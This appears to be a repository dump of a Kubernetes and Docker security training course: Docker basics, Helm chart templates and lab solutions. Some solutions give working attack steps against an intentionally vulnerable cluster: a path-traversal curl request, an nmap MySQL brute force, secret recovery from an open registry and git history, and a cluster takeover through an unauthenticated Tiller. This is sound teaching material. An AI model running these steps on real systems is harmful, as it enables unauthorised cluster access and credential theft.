demos has been taken from [https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md](https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md). Thanks to [Erlend Oftedal](https://github.com/eoftedal) 4 | 5 | A simple project with a web server and deployed it on Kubernetes. The web application had two endpoints `/public/` and `/secret/`. Added an authorization policy which tried to grant access to anything below `/public/`: 6 | 7 | ```yaml 8 | rules: 9 | - services: ["backend.fishy.svc.cluster.local"] 10 | methods: ["GET"] 11 | paths: ["/public/*"] 12 | ``` 13 | 14 | Then used standard path traversal from curl: 15 | 16 | ```bash 17 | curl -vvvv --path-as-is "http://backend.fishy.svc.cluster.local:8081/public/../secret/" 18 | ``` 19 | 20 | And was able to reach `/secret/`. 21 | 22 | 23 | ### Reference 24 | 25 | * [Security postmortem for CVE-2019-9900, CVE-2019-9901](https://github.com/envoyproxy/envoy/blob/master/security/postmortems/cve-2019-9900.md) 26 | * [Announcing Istio 1.1.2 with Important Security Update](https://istio.io/blog/2019/announcing-1.1.2/#vulnerability-impact) 27 | * [CVE-2019-9901 - Istio/Envoy Path traversal](https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md) 28 | * [Envoy Proxy — high severity vulnerabilities that can lead to exposure of unauthorized services](https://medium.com/solo-io/envoy-proxy-high-severity-vulnerabilities-that-can-lead-to-exposure-of-unauthorized-services-e5af25b022de) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/NOTES.txt: -------------------------------------------------------------------------------- 1 | 1. 
Get the application URL by running these commands: 2 | {{- if .Values.ingress.enabled }} 3 | {{- range $host := .Values.ingress.hosts }} 4 | {{- range $.Values.ingress.paths }} 5 | http{{ if $.Values.ingress.tls }}s{{ end }}://{{ $host }}{{ . }} 6 | {{- end }} 7 | {{- end }} 8 | {{- else if contains "NodePort" .Values.service.type }} 9 | export NODE_PORT=$(kubectl get --namespace {{ .Release.Namespace }} -o jsonpath="{.spec.ports[0].nodePort}" services {{ include "server-health.fullname" . }}) 10 | export NODE_IP=$(kubectl get nodes --namespace {{ .Release.Namespace }} -o jsonpath="{.items[0].status.addresses[0].address}") 11 | echo http://$NODE_IP:$NODE_PORT 12 | {{- else if contains "LoadBalancer" .Values.service.type }} 13 | NOTE: It may take a few minutes for the LoadBalancer IP to be available. 14 | You can watch the status of by running 'kubectl get svc -w {{ include "server-health.fullname" . }}' 15 | export SERVICE_IP=$(kubectl get svc --namespace {{ .Release.Namespace }} {{ include "server-health.fullname" . }} -o jsonpath='{.status.loadBalancer.ingress[0].ip}') 16 | echo http://$SERVICE_IP:{{ .Values.service.port }} 17 | {{- else if contains "ClusterIP" .Values.service.type }} 18 | export POD_NAME=$(kubectl get pods --namespace {{ .Release.Namespace }} -l "app.kubernetes.io/name={{ include "server-health.name" . }},app.kubernetes.io/instance={{ .Release.Name }}" -o jsonpath="{.items[0].metadata.name}") 19 | echo "Visit http://127.0.0.1:8080 to use your application" 20 | kubectl port-forward $POD_NAME 8080:80 21 | {{- end }} 22 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/NOTES.txt: -------------------------------------------------------------------------------- 1 | 1. 
Get the application URL by running these commands: 2 | {{- if .Values.ingress.enabled }} 3 | {{- range $host := .Values.ingress.hosts }} 4 | {{- range $.Values.ingress.paths }} 5 | http{{ if $.Values.ingress.tls }}s{{ end }}://{{ $host }}{{ . }} 6 | {{- end }} 7 | {{- end }} 8 | {{- else if contains "NodePort" .Values.service.type }} 9 | export NODE_PORT=$(kubectl get --namespace {{ .Release.Namespace }} -o jsonpath="{.spec.ports[0].nodePort}" services {{ include "mailbox-service.fullname" . }}) 10 | export NODE_IP=$(kubectl get nodes --namespace {{ .Release.Namespace }} -o jsonpath="{.items[0].status.addresses[0].address}") 11 | echo http://$NODE_IP:$NODE_PORT 12 | {{- else if contains "LoadBalancer" .Values.service.type }} 13 | NOTE: It may take a few minutes for the LoadBalancer IP to be available. 14 | You can watch the status of by running 'kubectl get svc -w {{ include "mailbox-service.fullname" . }}' 15 | export SERVICE_IP=$(kubectl get svc --namespace {{ .Release.Namespace }} {{ include "mailbox-service.fullname" . }} -o jsonpath='{.status.loadBalancer.ingress[0].ip}') 16 | echo http://$SERVICE_IP:{{ .Values.service.port }} 17 | {{- else if contains "ClusterIP" .Values.service.type }} 18 | export POD_NAME=$(kubectl get pods --namespace {{ .Release.Namespace }} -l "app.kubernetes.io/name={{ include "mailbox-service.name" . }},app.kubernetes.io/instance={{ .Release.Name }}" -o jsonpath="{.items[0].metadata.name}") 19 | echo "Visit http://127.0.0.1:8080 to use your application" 20 | kubectl port-forward $POD_NAME 8080:80 21 | {{- end }} 22 | -------------------------------------------------------------------------------- /gitbook/advanced-concepts/docker-compoe-wordpress.md: -------------------------------------------------------------------------------- 1 | # docker-compose wordpress setup 2 | 3 | Compose is a tool for defining and running multi-container Docker applications. With Compose, you use a Compose file to configure your application's services. 
Then, using a single command, you create and start all the services from your configuration 4 | 5 | 6 | * Let's set up the WordPress site using docker-compose 7 | 8 | ```bash 9 | cd /opt/wordpress 10 | docker-compose up -d 11 | ``` 12 | 13 | ![docker compose wordpress](images/docker-compose-wordpress.png) 14 | 15 | * Access the WordPress site using `http://STUDENTVMIP:8000` 16 | 17 | ![wordpress site](images/wordpress-site.png) 18 | 19 | > Ignore any error related to broken CSS. This is due to an IP address mismatch in the WordPress configuration. 20 | 21 | ## Looking at `docker-compose.yml` 22 | 23 | * Inspect the compose file by running `less /opt/wordpress/docker-compose.yml`. Note that the database credentials are stored in plain text in this file and handed to the containers as environment variables, so anyone who can read the file (or inspect the running containers) can recover them. 24 | 25 | ```yml 26 | version: '3.3' 27 | 28 | services: 29 | db: 30 | image: mysql:5.7 31 | volumes: 32 | - db_data:/var/lib/mysql 33 | restart: always 34 | environment: 35 | MYSQL_ROOT_PASSWORD: SuperSecret321 36 | MYSQL_DATABASE: wordpress 37 | MYSQL_USER: wordpress 38 | MYSQL_PASSWORD: ComplicatedPassword 39 | 40 | wordpress: 41 | depends_on: 42 | - db 43 | image: wordpress:latest 44 | ports: 45 | - "8000:80" 46 | restart: always 47 | environment: 48 | WORDPRESS_DB_HOST: db:3306 49 | WORDPRESS_DB_USER: wordpress 50 | WORDPRESS_DB_PASSWORD: ComplicatedPassword 51 | volumes: 52 | db_data: 53 | ``` 54 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/NOTES.txt: -------------------------------------------------------------------------------- 1 | 1. Get the application URL by running these commands: 2 | {{- if .Values.ingress.enabled }} 3 | {{- range $host := .Values.ingress.hosts }} 4 | {{- range $.Values.ingress.paths }} 5 | http{{ if $.Values.ingress.tls }}s{{ end }}://{{ $host }}{{ . 
}} 6 | {{- end }} 7 | {{- end }} 8 | {{- else if contains "NodePort" .Values.service.type }} 9 | export NODE_PORT=$(kubectl get --namespace {{ .Release.Namespace }} -o jsonpath="{.spec.ports[0].nodePort}" services {{ include "connectivity-check.fullname" . }}) 10 | export NODE_IP=$(kubectl get nodes --namespace {{ .Release.Namespace }} -o jsonpath="{.items[0].status.addresses[0].address}") 11 | echo http://$NODE_IP:$NODE_PORT 12 | {{- else if contains "LoadBalancer" .Values.service.type }} 13 | NOTE: It may take a few minutes for the LoadBalancer IP to be available. 14 | You can watch the status of by running 'kubectl get svc -w {{ include "connectivity-check.fullname" . }}' 15 | export SERVICE_IP=$(kubectl get svc --namespace {{ .Release.Namespace }} {{ include "connectivity-check.fullname" . }} -o jsonpath='{.status.loadBalancer.ingress[0].ip}') 16 | echo http://$SERVICE_IP:{{ .Values.service.port }} 17 | {{- else if contains "ClusterIP" .Values.service.type }} 18 | export POD_NAME=$(kubectl get pods --namespace {{ .Release.Namespace }} -l "app.kubernetes.io/name={{ include "connectivity-check.name" . }},app.kubernetes.io/instance={{ .Release.Name }}" -o jsonpath="{.items[0].metadata.name}") 19 | echo "Visit http://127.0.0.1:8080 to use your application" 20 | kubectl port-forward $POD_NAME 8080:80 21 | {{- end }} 22 | -------------------------------------------------------------------------------- /gitbook/scenario-5/solution.md: -------------------------------------------------------------------------------- 1 | # Attacking applications in different namespaces in Kubernetes cluster - Solution 2 | 3 | * Get pod details and login to the `net-tools` pod using below command. 
4 | 5 | ```bash 6 | export NET_TOOLS_POD=$(kubectl get pods --selector app=net-tools -o jsonpath="{.items[0].metadata.name}") 7 | kubectl exec -it $NET_TOOLS_POD bash 8 | ``` 9 | 10 | ![](images/get-pod-name.png) 11 | 12 | * As MySQL runs on port 3306 by default, we can scan the pod IP range for this port. The `10.36.4.0/24` range is specific to this lab cluster; use your own cluster's pod CIDR (see the references below). The SYN scan (`-sS`) needs raw sockets, i.e. the `NET_RAW` capability inside the pod; if that capability has been dropped, use a connect scan (`-sT`) instead. 13 | 14 | ```bash 15 | nmap -n -Pn -p3306 --open -sS -T5 10.36.4.0/24 16 | ``` 17 | 18 | ![](images/nmap-scan.png) 19 | 20 | * Once we have discovered the MySQL service, we can brute-force the credentials to log in to the server. We can run a brute-force attack using nmap and its scripting engine. 21 | 22 | ```bash 23 | echo root > users.txt 24 | nmap --script mysql-brute 10.36.4.30 -p3306 -T4 --script-args "userdb=users.txt" 25 | ``` 26 | 27 | ![](images/nmap-mysql-bruteforce.png) 28 | 29 | * Once the credentials are discovered, we can access the MySQL instance with the obtained password from within the cluster network, even though it runs in a different namespace: without a NetworkPolicy, namespaces provide no network isolation, so pods in one namespace can reach services in any other 30 | 31 | ```bash 32 | mysql -u root -psecret -h 10.36.4.30 33 | ``` 34 | 35 | ![](images/mysql-access.png) 36 | 37 | 38 | * Verify the pods and services available in the `database` namespace 39 | 40 | ```bash 41 | kubectl get ns 42 | kubectl get all -n database 43 | ``` 44 | 45 | ![](images/get-ns-data.png) 46 | 47 | ### References 48 | 49 | * [https://ahmet.im/blog/kubernetes-network-policy/](https://ahmet.im/blog/kubernetes-network-policy/) 50 | * [Google Cloud Cluster CIDR](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr) -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/dockerfile.md: -------------------------------------------------------------------------------- 1 | # Dockerfile 2 | 3 | A `Dockerfile` is a configuration file that contains instructions for building a Docker image 4 | 5 | * Provides a more effective way to build images compared to using docker commit 6 | * Easily fits into your continuous integration and deployment process 7 | 8 | 9 
| ## Example Dockerfile 10 | 11 | * `FROM` instruction specifies what the base image should be 12 | * `RUN` instruction specifies a command to execute 13 | * `CMD` is to provide defaults for an executing container 14 | 15 | ```Dockerfile 16 | # Example of a comment 17 | FROM ubuntu 18 | 19 | RUN apt-get update 20 | RUN apt-get install curl -y 21 | RUN apt-get install htop -y 22 | 23 | CMD ["htop"] 24 | ``` 25 | 26 | ## Create a simple htop container 27 | 28 | * Create a new directory and change into it 29 | 30 | ```bash 31 | mkdir htop-container 32 | cd htop-container 33 | ``` 34 | 35 | * Create the file below using `vi Dockerfile`. Note that `FROM ubuntu` with no tag resolves to `ubuntu:latest`, so the base image can change between builds; pin a specific tag (or digest) for anything beyond a throwaway exercise 36 | 37 | ```Dockerfile 38 | FROM ubuntu 39 | LABEL MAINTAINER "user@domain.com" 40 | 41 | RUN apt-get update && apt-get install -y \ 42 | curl \ 43 | htop 44 | 45 | CMD ["htop"] 46 | ``` 47 | 48 | * Build the docker image 49 | 50 | ```bash 51 | docker build -t abh1sek/htop:1.0 . 52 | ``` 53 | 54 | ![building docker image](images/docker-build-image.png) 55 | 56 | * Run the `htop` container 57 | 58 | ```bash 59 | docker run --rm -it abh1sek/htop:1.0 60 | ``` 61 | 62 | ## References 63 | 64 | * [Dockerfile reference](https://docs.docker.com/engine/reference/builder) 65 | * [Best practices for writing Dockerfiles](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/) -------------------------------------------------------------------------------- /gitbook/extra/control-groups.md: -------------------------------------------------------------------------------- 1 | # Control Groups 2 | 3 | The kernel uses cgroups also known as control groups to group processes for the purpose of system resource management. Cgroups allocate CPU time, system memory, network bandwidth, or combinations of these among user-defined groups of tasks. 
4 | 5 | * Let's run two containers with different cpu shares 6 | 7 | ```bash 8 | docker run -d --name='low_priority' \ 9 | --cpuset-cpus=0 --cpu-shares=10 alpine md5sum /dev/urandom 10 | 11 | docker run -d --name='high_priority' \ 12 | --cpuset-cpus=0 --cpu-shares=50 alpine md5sum /dev/urandom 13 | ``` 14 | 15 | * Now we can see the utilization status by running `htop` 16 | 17 | ```bash 18 | docker run --rm -it --pid host jess/htop 19 | ``` 20 | 21 | ![cgroup with shares](images/cgroup-with-shares.png) 22 | 23 | * Stop and remove the running containers 24 | 25 | ```bash 26 | docker stop low_priority high_priority 27 | docker rm low_priority high_priority 28 | ``` 29 | 30 | * Now run the containers without any cpu shares specified 31 | 32 | ```bash 33 | docker run -d --name='low_priority' alpine md5sum /dev/urandom 34 | docker run -d --name='high_priority' alpine md5sum /dev/urandom 35 | ``` 36 | 37 | * Check resource utilization using `htop` 38 | 39 | ```bash 40 | docker run --rm -it --pid host jess/htop 41 | ``` 42 | 43 | ![cgroup without shares](images/cgroup-with-out-shares.png) 44 | 45 | * Stop and remove the running containers 46 | 47 | ```bash 48 | docker stop low_priority high_priority 49 | docker rm low_priority high_priority 50 | ``` 51 | 52 | 53 | ## References 54 | 55 | * [Limit a container's resources](https://docs.docker.com/v17.09/engine/admin/resource_constraints/) -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/solution.md: -------------------------------------------------------------------------------- 1 | # Attacking Private Registry - Solution 2 | 3 | * Understanding the API structure of the docker private registry to list of images 4 | 5 | ```bash 6 | curl 165.22.221.65:5000/v2/_catalog 7 | ``` 8 | 9 | * Get the list of tags for the images 10 | 11 | ```bash 12 | curl 165.22.221.65:5000/v2/privatecode/tags/list 13 | ``` 14 | 15 | ![List images with tags in private 
registry](images/private-registry-list.png) 16 | 17 | 18 | * Add the `--insecure-registry` flag to the Docker daemon so it can pull from this registry: edit `vi /lib/systemd/system/docker.service`. This tells the daemon to accept plain HTTP (or an untrusted certificate) from that one registry, so only do it for a lab registry you control 19 | 20 | ```bash 21 | ExecStart=/usr/bin/dockerd -H fd:// --insecure-registry 165.22.221.65:5000 22 | ``` 23 | 24 | * Then restart the service 25 | 26 | ```bash 27 | sudo systemctl daemon-reload 28 | sudo service docker restart 29 | ``` 30 | 31 | * Download the image from the private registry 32 | 33 | ```bash 34 | docker pull 165.22.221.65:5000/privatecode:golang-developer-team 35 | ``` 36 | 37 | ![pulling docker image](images/pull-docker.png) 38 | 39 | * Enter the container using the command below and look for interesting files and folders 40 | 41 | ```bash 42 | docker run --rm -it 165.22.221.65:5000/privatecode:golang-developer-team sh 43 | 44 | cd /app 45 | ls -la 46 | ``` 47 | 48 | ![entering into container for analysis](images/enter-into-container.png) 49 | 50 | * Now look at the git commit log 51 | 52 | ```bash 53 | git log 54 | ``` 55 | 56 | ![git commit logs](images/commit-log.png) 57 | 58 | * Then check out the commit in which the environment file was present and look for files and secrets. Removing a secret in a later commit does not remove it from the repository history, which is why it is still recoverable here 59 | 60 | ```bash 61 | git checkout f17a07721ab9acec96aef0b1794ee466e516e37a 62 | 63 | ls -la 64 | 65 | cat .env 66 | ``` 67 | 68 | ![revert and look for secrets](images/revert-and-secrets.png) -------------------------------------------------------------------------------- /gitbook/getting-started/kubernetes-cluster-setup.md: -------------------------------------------------------------------------------- 1 | # Kubernetes Cluster Setup 2 | 3 | We will set up a Kubernetes cluster in Google Cloud. For this, you will require: 4 | 5 | 1. Google Cloud account 6 | 2. [kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/) 7 | 3. [Helm 2](https://v2.helm.sh/docs/install/) 8 | 4. 
[gcloud](https://cloud.google.com/sdk/install) 9 | 10 | * Ensure `gcloud` is configured and able to access your Google Cloud account. This can be verified using 11 | 12 | ``` 13 | gcloud projects list 14 | ``` 15 | 16 | * Ensure you have a `helm2` symlink pointing to the Helm v2.x binary. The setup script uses `helm2` to invoke Helm v2. 17 | 18 | > **NOTE:** Setting up a cluster in Google Cloud will incur cost. Refer to `setup.sh` for the resources created. The apps it deploys are intentionally vulnerable, so use a dedicated project or cluster that holds nothing else, and run `destroy.sh` as soon as you are done. 19 | 20 | ## Create Cluster 21 | 22 | ``` 23 | export STUDENTPROJECTNAME="Google-Cloud-Project-Name" 24 | ./setup.sh 25 | ``` 26 | 27 | > The cluster creation script `setup.sh` will generate a script `destroy.sh` that can be used to delete the resources created on Google Cloud 28 | 29 | The `setup.sh` will 30 | 31 | 1. Create a Kubernetes cluster on Google Cloud using `gcloud` 32 | 2. Allocate a static IP address for Ingress 33 | 3. Deploy vulnerable apps and config 34 | 4. Generate `kubeconfig` file in current directory 35 | 5. Generate `destroy.sh` script to destroy [1] and [2] 36 | 37 | ## Expose Vulnerable Apps 38 | 39 | ``` 40 | sudo kubectl port-forward -n kube-system svc/nginx-ingress-controller 80:80 41 | ``` 42 | 43 | The default ingress `app-ingress/app-ingress.yml` uses host names that resolve to `127.0.0.1`. The above command will forward port 80 on localhost to the `Nginx Ingress` service running inside the cluster. `sudo` is needed only to bind port 80; since `sudo` usually resets the environment, pass the generated kubeconfig explicitly (e.g. `--kubeconfig ./kubeconfig`) if kubectl cannot find the cluster. 44 | 45 | ## Destroy Cluster 46 | 47 | ``` 48 | ./destroy.sh 49 | ``` -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/capabilities.md: -------------------------------------------------------------------------------- 1 | # Capabilities 2 | 3 | Capabilities turn the binary "root/non-root" into a fine-grained access control system. Processes (like web servers) that just need to bind on a port below 1024 do not have to run as root, they can just be granted the `net_bind_service` capability instead. 
4 | 5 | > Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. 6 | 7 | ## Capabilities Demonstration 8 | 9 | * Let's run the ping command in a container 10 | 11 | ```bash 12 | docker run --rm -it alpine sh 13 | 14 | ping 127.0.0.1 -c 2 15 | ``` 16 | 17 | ![capabilities ping](images/capabilities-ping.png) 18 | 19 | * Now, let's remove the `CAP_NET_RAW` capability and try again 20 | 21 | ```bash 22 | docker run --rm -it --cap-drop=NET_RAW alpine sh 23 | 24 | ping 127.0.0.1 -c 2 25 | ``` 26 | 27 | ![capabilities ping drop](images/capabilities-ping-drop.png) 28 | 29 | 30 | ## Checking for the list of capabilities 31 | 32 | * We can list the capabilities granted to a container (or to the host) with `capsh --print`. The image ID `71aa5f3f90dc` is specific to the lab VM; substitute any image that ships `capsh` (check `docker images`) 33 | 34 | ```bash 35 | docker run --rm -it 71aa5f3f90dc bash 36 | 37 | capsh --print 38 | ``` 39 | 40 | ![capsh print](images/capsh-print.png) 41 | 42 | 43 | ## Running a fully privileged container 44 | 45 | * Run the command below to start a privileged container. `--privileged` grants the container every capability and access to the host's devices, so it should be treated as equivalent to root on the host 46 | 47 | ```bash 48 | docker run --rm -it --privileged=true 71aa5f3f90dc bash 49 | 50 | capsh --print 51 | ``` 52 | 53 | ![privileged container](images/privileged-container.png) 54 | 55 | * It is possible to access host devices from a privileged container, for example reading the host kernel log with `more /dev/kmsg` 56 | 57 | > The /dev/kmsg character device node provides userspace access to the kernel's printk buffer. 
58 | 59 | ![/dev/kmsg log](images/privileged-container-kmsg.png) -------------------------------------------------------------------------------- /gitbook/scenario-6/solution.md: -------------------------------------------------------------------------------- 1 | # Attacking Helm tiller without RBAC setup - Solution 2 | 3 | * Let's assume that you already have access to a pod inside a cluster through an application vulnerability (e.g. command injection) 4 | 5 | * Then we can run the command below to deploy a simple pod that contains the `helm` and `kubectl` binaries 6 | 7 | ```bash 8 | kubectl run -n default --quiet --rm --restart=Never -ti --image=madhuakula/helm-security incluster 9 | ``` 10 | 11 | ![](images/deploy-pod.png) 12 | 13 | * If we check the helm version, it responds with `Error: pods is forbidden: User "system:serviceaccount:default:default" cannot list pods in the namespace "kube-system"`. This only means the helm client could not locate Tiller through the Kubernetes API (it tries to list pods in `kube-system`, which the pod's default service account is not allowed to do); it does not mean Tiller itself is unreachable 14 | 15 | ```bash 16 | helm version 17 | ``` 18 | 19 | * Let's connect to Tiller's default service and port. The service `tiller-deploy.kube-system` listens on port `44134` and, as set up in this lab, accepts connections from any pod without authentication 20 | 21 | ```bash 22 | telnet tiller-deploy.kube-system 44134 23 | 24 | Ctrl+C 25 | ``` 26 | 27 | ![](images/telnet-tiller.png) 28 | 29 | * Now we can point helm at the service directly with the `--host` flag, bypassing the API lookup: `helm --host tiller-deploy.kube-system:44134 version` 30 | 31 | ![](images/helm-with-host-flag.png) 32 | 33 | * Let's try getting the secrets from the `kube-system` namespace using kubectl `kubectl get secrets -n kube-system`. 
We can clearly see that we can't get the secrets with the default service account attached to this pod 34 | 35 | ![](images/kubectl-secrets-before-attack.png) 36 | 37 | * Let's go ahead and install our `pwnchart` helm chart. Tiller applies the chart's manifests with its own service account (when Tiller is installed without RBAC hardening this is typically cluster-admin), so the chart can create RBAC objects that the pod's own service account never could 38 | 39 | ```bash 40 | helm --host tiller-deploy.kube-system:44134 install /pwnchart 41 | ``` 42 | 43 | ![](images/helm-deploy-pwnchart.png) 44 | 45 | * Now let's try again to get the secrets from the `kube-system` namespace using kubectl `kubectl get secrets -n kube-system`. 46 | 47 | ![](images/kube-secrets-after-attack.png) 48 | 49 | * We now have full cluster access: the pod's service account can do whatever a cluster admin can do. The root cause is an unauthenticated Tiller, reachable from any pod and running with far more privilege than its callers; mitigations include enabling TLS client authentication on Tiller, restricting access to it with a NetworkPolicy, or moving to Helm 3, which has no Tiller -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: {{ include "server-health.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "server-health.name" . }} 7 | helm.sh/chart: {{ include "server-health.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | replicas: {{ .Values.replicaCount }} 12 | selector: 13 | matchLabels: 14 | app.kubernetes.io/name: {{ include "server-health.name" . }} 15 | app.kubernetes.io/instance: {{ .Release.Name }} 16 | template: 17 | metadata: 18 | labels: 19 | app.kubernetes.io/name: {{ include "server-health.name" . 
}} 20 | app.kubernetes.io/instance: {{ .Release.Name }} 21 | spec: 22 | containers: 23 | - name: {{ .Chart.Name }} 24 | image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}" 25 | imagePullPolicy: {{ .Values.image.pullPolicy }} 26 | ports: 27 | - name: http 28 | containerPort: 80 29 | protocol: TCP 30 | livenessProbe: 31 | tcpSocket: 32 | port: http 33 | initialDelaySeconds: 15 34 | periodSeconds: 20 35 | readinessProbe: 36 | tcpSocket: 37 | port: http 38 | initialDelaySeconds: 5 39 | periodSeconds: 10 40 | resources: 41 | {{- toYaml .Values.resources | nindent 12 }} 42 | {{- with .Values.nodeSelector }} 43 | nodeSelector: 44 | {{- toYaml . | nindent 8 }} 45 | {{- end }} 46 | {{- with .Values.affinity }} 47 | affinity: 48 | {{- toYaml . | nindent 8 }} 49 | {{- end }} 50 | {{- with .Values.tolerations }} 51 | tolerations: 52 | {{- toYaml . | nindent 8 }} 53 | {{- end }} 54 | -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/docker-registries.md: -------------------------------------------------------------------------------- 1 | # Auditing Docker Registries 2 | 3 | A Docker registry is a distribution system for Docker images. There will be different images and each may contain multiple tags and versions. By default the registry runs on port `5000` without authentication and TLS. 4 | 5 | In this section, we will be using a simple unauthenticated docker private registry to perform security audit. 6 | 7 | 8 | * We can check if the docker registry is up by running the following command in the student VM 9 | 10 | ```bash 11 | curl -s http://localhost:5000/v2/_catalog | jq . 12 | ``` 13 | 14 | ![docker registry access](images/docker-registry-access.png) 15 | 16 | * Get the list of tags and versions of a docker image from the registry 17 | 18 | ```bash 19 | curl -s http://localhost:5000/v2/devcode/tags/list | jq . 
20 | ``` 21 | 22 | ![docker image tags list](images/docker-registry-access-image.png) 23 | 24 | 25 | * Downloading a registry image locally 26 | 27 | ```bash 28 | docker pull localhost:5000/devcode:latest 29 | ``` 30 | 31 | ![download image locally](images/download-image-locally.png) 32 | 33 | * Reviewing the image for sensitive data and hard-coded secrets, here an AWS credentials file baked into the image 34 | 35 | ```bash 36 | docker run --rm -it localhost:5000/devcode:latest sh 37 | 38 | cat /.aws/credentials 39 | ``` 40 | 41 | ![docker secrets analysis](images/docker-analysis-secrets.png) 42 | 43 | 44 | * Let's check the default Docker daemon configuration. This prints the default username and registry used by the Docker runtime 45 | 46 | ``` 47 | docker system info 48 | ``` 49 | 50 | ![docker system info registries](images/docker-system-info-registries.png) 51 | 52 | * Let's look at the registries configured on the host. `~/.docker/config.json` stores registry credentials (unless a credential helper is configured, they are only base64-encoded, not encrypted), and they may authorize us to pull and/or push images to the registry 53 | 54 | ``` 55 | cat ~/.docker/config.json 56 | ``` 57 | 58 | ![docker registry config secrets](images/docker-registry-config-secrets.png) 59 | -------------------------------------------------------------------------------- /gitbook/kubesec/readme.md: -------------------------------------------------------------------------------- 1 | # Running kubesec.io 2 | 3 | Kubesec quantifies risk for Kubernetes resources by validating the configuration files and manifest files used for Kubernetes deployments and operations. 
4 | 5 | ## How to run kubesec 6 | 7 | * Replace `${FILE}` with the name of the manifest you want to scan. Note that this command uploads the manifest to the third-party service at kubesec.io, so do not send manifests that contain secrets or internal details; kubesec can also be run locally 8 | 9 | ```bash 10 | cd /data/kubesec 11 | curl --silent --compressed --connect-timeout 5 https://kubesec.io -F file=@"${FILE}" 12 | ``` 13 | 14 | * Run for the `insecuredeployment.yaml` 15 | 16 | ```yaml 17 | apiVersion: v1 18 | kind: Pod 19 | metadata: 20 | name: kubesec-demo 21 | spec: 22 | containers: 23 | - name: kubesec-demo 24 | image: gcr.io/google-samples/node-hello:1.0 25 | securityContext: 26 | privileged: true 27 | readOnlyRootFilesystem: true 28 | ``` 29 | 30 | ![](images/insecure-deployment.png) 31 | 32 | 33 | * Run for the `securedeployment.yaml`. Before applying this manifest to a real cluster, correct two issues in it: `requsts` is a typo for `requests` (the misspelled block will not be honoured), and the CPU and memory limits are lower than the requests, which the API server rejects 34 | 35 | ```yaml 36 | apiVersion: v1 37 | kind: Pod 38 | metadata: 39 | name: kubesec-demo 40 | spec: 41 | containers: 42 | - name: kubesec-demo 43 | image: gcr.io/google-samples/node-hello:1.0 44 | securityContext: 45 | runAsNonRoot: true 46 | capabilities: 47 | drop: ["ALL"] 48 | add: ["NET_ADMIN", "SYS_TIME"] 49 | readOnlyRootFilesystem: true 50 | runAsUser: 100000 51 | resources: 52 | requsts: 53 | cpu: 20m 54 | memory: 30Mi 55 | limits: 56 | cpu: 10m 57 | memory: 20Mi 58 | ``` 59 | 60 | ```bash 61 | curl --silent --compressed --connect-timeout 5 https://kubesec.io -F file=@"securedeployment.yaml" 62 | ``` 63 | 64 | ![](images/secure-deployment.png) 65 | 66 | ### References 67 | * [https://kubesec.io](https://kubesec.io/) 68 | * [https://xsses.rocks/kubernetes-systems-hacked-to-mine-xmr](https://xsses.rocks/kubernetes-systems-hacked-to-mine-xmr/) -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/docker-run.md: -------------------------------------------------------------------------------- 1 | # Docker run 2 | 3 | ### Running docker container 4 | 5 | * Run the following command to start an 
Ubuntu container 6 | 7 | ```bash 8 | docker run ubuntu:latest echo "Welcome to Ubuntu" 9 | ``` 10 | 11 | ![welcome ubuntu docker](images/docker-run-welcome-ubuntu.png) 12 | 13 | 14 | * Run the following command to start an Ubuntu container with an interactive bash shell 15 | 16 | ```bash 17 | docker run --name samplecontainer -it ubuntu:latest /bin/bash 18 | ``` 19 | 20 | ![docker interactive bash](images/docker-interactive-bash.png) 21 | 22 | ### Find your containers 23 | 24 | * Listing running containers 25 | 26 | ```bash 27 | docker ps 28 | ``` 29 | 30 | ![docker ps](images/docker-ps.png) 31 | 32 | * Listing all containers (running/stopped) 33 | 34 | ```bash 35 | docker ps -a 36 | ``` 37 | 38 | ![docker ps -a](images/docker-ps-a.png) 39 | 40 | 41 | ### Listing docker images 42 | 43 | ```bash 44 | docker images 45 | ``` 46 | 47 | ![docker images](images/docker-images.png) 48 | 49 | 50 | ### Running a container in detached mode 51 | 52 | * Run an alpine container in the background 53 | 54 | ```bash 55 | docker run --name pingcontainer -d alpine:latest ping 127.0.0.1 -c 50 56 | ``` 57 | 58 | * Looking at the logs (stdout) of a container 59 | 60 | ``` 61 | docker logs -f pingcontainer 62 | ``` 63 | 64 | ![docker detach logs](images/docker-detach-logs.png) 65 | 66 | ### Running an nginx container and accessing the service 67 | 68 | ```bash 69 | docker run -d --name nginxalpine -p 7777:80 nginx:alpine 70 | ``` 71 | 72 | * Accessing the container service from the host system using the mapped port. Note that `-p 7777:80` binds on all host interfaces, so the service is reachable from the network, not just from localhost; use `-p 127.0.0.1:7777:80` if that is not intended 73 | 74 | ```bash 75 | curl localhost:7777 76 | ``` 77 | 78 | ![accessing nginx from host](images/nginxalpine-host.png) 79 | 80 | * Accessing the container service using the container IP and container port (use whatever address `ip addr` shows for your container; `172.17.0.2` is just an example) 81 | 82 | ```bash 83 | docker exec -it nginxalpine sh 84 | 85 | ip addr 86 | 87 | curl 172.17.0.2:80 88 | ``` 89 | 90 | ![accessing nginx from container port](images/nginxalpine-container.png) -------------------------------------------------------------------------------- 
